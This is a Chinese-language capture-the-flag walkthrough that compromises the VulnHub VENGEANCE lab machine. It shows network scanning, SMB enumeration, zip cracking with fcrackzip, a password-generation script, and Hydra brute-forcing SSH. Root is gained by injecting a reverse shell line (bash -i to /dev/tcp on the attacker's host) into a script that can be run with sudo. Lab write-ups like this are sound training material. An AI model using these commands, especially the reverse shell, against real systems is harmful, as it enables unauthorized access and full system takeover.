準備:
攻擊機:虛擬機器kali、本機win10。
靶機:digitalworld.local: VENGEANCE,下載地址:https://download.vulnhub.com/digitalworld/VENGEANCE.7z,下載後直接vm開啟即可。
知識點:dns解析、smb服務資訊收集、cewl爬取密碼字典、fcrackzip爆破、python簡單指令碼編寫、hydra爆破、pspy64資訊收集。
資訊收集:
透過nmap掃描下網段內的存活主機地址,確定下靶機的地址:nmap -sn 192.168.5.0/24,獲得靶機地址:192.168.5.160。
掃描下埠對應的服務:nmap -T4 -sV -p- -A 192.168.5.160,顯示開放了80、139、143、22222等埠,開啟了http服務、ssh服務等服務。
Host is up (0.0011s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7/tcp closed echo
22/tcp closed ssh
80/tcp open http nginx 1.18.0 (Ubuntu)
|_auth-owners: www-data
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
88/tcp closed kerberos-sec
110/tcp open pop3
| fingerprint-strings:
| LDAPSearchReq:
| +OK Dovecot (Ubuntu) ready.
| -ERR Unknown command.
|_ -ERR Unknown command.
|_auth-owners: dovenull
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE PIPELINING SASL TOP CAPA STLS UIDL
113/tcp open ident?
|_auth-owners: root
139/tcp open netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS STARTTLS IDLE have OK listed LITERAL+ capabilities ID post-login Pre-login LOGINDISABLEDA0001 IMAP4rev1 more SASL-IR ENABLE
|_auth-owners: dovenull
161/tcp closed snmp
389/tcp closed ldap
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
| tls-nextprotoneg:
| h2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=VENGEANCE/organizationName=Good Tech Inc/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2021-02-14T02:40:28
|_Not valid after: 2022-02-14T02:40:28
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_auth-owners: www-data
| tls-alpn:
| h2
|_ http/1.1
|_http-title: 400 The plain HTTP request was sent to HTTPS port
445/tcp open netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
993/tcp open imaps?
995/tcp open pop3s?
1337/tcp closed waste
2049/tcp closed nfs
6000/tcp closed X11
8080/tcp closed http-proxy
22222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 32:eb:05:fa:d3:75:45:5e:c7:72:fb:03:aa:05:b7:d7 (RSA)
| 256 40:16:f8:d1:f1:06:e5:aa:13:44:28:ed:e0:55:ef:34 (ECDSA)
|_ 256 52:78:15:c2:3b:a1:90:20:3a:b1:d6:75:93:72:d8:f8 (ED25519)
|_auth-owners: root
54321/tcp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port110-TCP:V=7.92%I=7%D=2/3%Time=63DC649B%P=x86_64-pc-linux-gnu%r(LDAP
SF:SearchReq,4B,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n-ERR\x20Unkno
SF:wn\x20command\.\r\n-ERR\x20Unknown\x20command\.\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-03T01:34:24
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.23 seconds
訪問其web介面發現一個搜尋框,點選之後跳轉到:http://vengeance.goodtech.inc/?s=1,因此需要進行dns解析,win:開啟C:\Windows\System32\drivers\etc\hosts檔案,kali:開啟/etc/hosts檔案,新增:192.168.5.160 vengeance.goodtech.inc。之後再次訪問並進行簡單的注入測試,但是未成功。
smb資訊收集:
使用enum4linux對靶機進行掃描,發現部分目錄資訊和使用者資訊,目錄資訊:sarapublic、print,使用者資訊:sara、qinyi。
訪問sarapublic目錄資訊,發現eaurouge.txt、essay.txt、gio.zip等檔案,將檔案下載到本地,一次訪問檔案資訊,但是未發現可疑利用得資訊。
在進行解壓gio.zip檔案時需要密碼才行,嘗試對密碼進行爆破,但是未爆破成功。
cewl生成字典:
利用cewl爬取幾個檔案資訊生成密碼本,命令:cewl 192.168.5.150:8000/profile.txt >> passwd。
利用生成得密碼本使用fcrackzip再次對gio.zip檔案進行爆破,命令:fcrackzip -D -p /home/kali/Desktop/passwd -u gio.zip,成功獲得密碼:nanotechnological,使用獲得密碼:nanotechnological對gio.zip檔案進行解壓,獲得:pass_reminder.txt 、ted_talk.pptx 、tryharder.png檔案。
讀取pass_reminder.txt檔案,檢視密碼提示資訊:name_corner_circuit(姓名_轉角_線路),訪問ted_talk.pptx,在其中一次發現:Giovanni Berlusconi、130R、Suzuka。
獲取shell:
根據獲得密碼組成資訊:Giovanni Berlusconi、130R、Suzuka,使用python指令碼生成密碼字典。
names = ['Giovanni Berlusconi','giovanni Berlusconi','giovanni','Giovanni']
corners = ['130R','130r']
circuits = ['Suzuka','suzuka']
for name in names:
passwd_n = name + '_'
for corner in corners:
passwd_co = passwd_n + corner + '_'
for circuit in circuits:
passwd_ci = passwd_co + circuit
print(passwd_ci)
passwd_ci = ''
使用前面獲得的賬戶:sara、qinyi和生成的密碼字典使用hydra進行爆破,命令:hydra -L user -P passwd ssh://192.168.5.160:22222,成功獲得正確的賬戶 和密碼資訊:qinyi/giovanni_130R_Suzuka。
使用獲得賬戶和密碼資訊:qinyi/giovanni_130R_Suzuka,進行ssh登入,成功獲得shell許可權。
提權:
檢視下當前賬戶是否存在可以使用的特權命令,sudo -l,發現:/bin/systemctl、/home/sara/private/eaurouge,但是無檢視和執行許可權。
上傳pspy64檔案並執行進行資訊收集,發現開啟69埠。
使用nmap對69埠進行掃描,發現開啟開啟了tftp服務,連線tftp服務,命令:tftp 192.168.5.160,下載eaurouge檔案並訪問該檔案。發現該檔案是一個shell指令碼,因此在指令碼中新增shell反彈語句:bash -i >&/dev/tcp/192.168.5.150/6688 0>&1。
在kali中開啟對6688埠的監聽,然後在shell中執行/home/sara/private/eaurouge檔案,成功獲得root許可權,並在root目錄下發現proof.txt檔案,讀取該檔案獲得flag值。